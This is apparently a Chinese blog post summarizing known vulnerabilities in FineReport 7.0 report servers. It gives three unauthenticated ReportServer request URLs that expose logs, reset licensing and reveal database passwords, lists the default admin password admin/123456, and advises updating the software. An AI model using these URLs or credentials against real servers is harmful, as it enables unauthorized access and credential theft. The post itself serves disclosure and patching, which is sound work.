帆软报表漏洞总结

一、漏洞背景

FineReport报表软件是帆软软件（中国）公司自主研发的一款纯Java编写的企业级web报表软件。主要针对2012年7.0版本存在一些安全漏洞问题。

二、版本查看

• 弱口令漏洞提供了访问此页面方法

三、漏洞总结

1.未授权访问漏洞

http://ip/ReportServer?op=fr_server&cmd=sc_visitstatehtml&showtoolbar=false //未授权访问内网ip的日志
http://ip/ReportServer?op=fr_server&cmd=sc_version_info&showtoolbar=false //未授权访问重置授权
http://ip/ReportServer?op=fr_server&cmd=sc_getconnectioninfo //未授权查看数据库密码

2.默认弱口令

• 访问https://ip/ReportServer，点击服务器管理平台进入后台页面
• 默认密码为弱口令admin/123456

四、漏洞修复

更新帆软报表的版本

• 目前仅为本人自己遇见的一些情况，后续若遇到新的poc或者exp会进行及时更新，恳请大佬师傅们提成建议！

仅供学习参考使用！！若厂商有使用此版本，自行查验，及时联系官方进行更新！！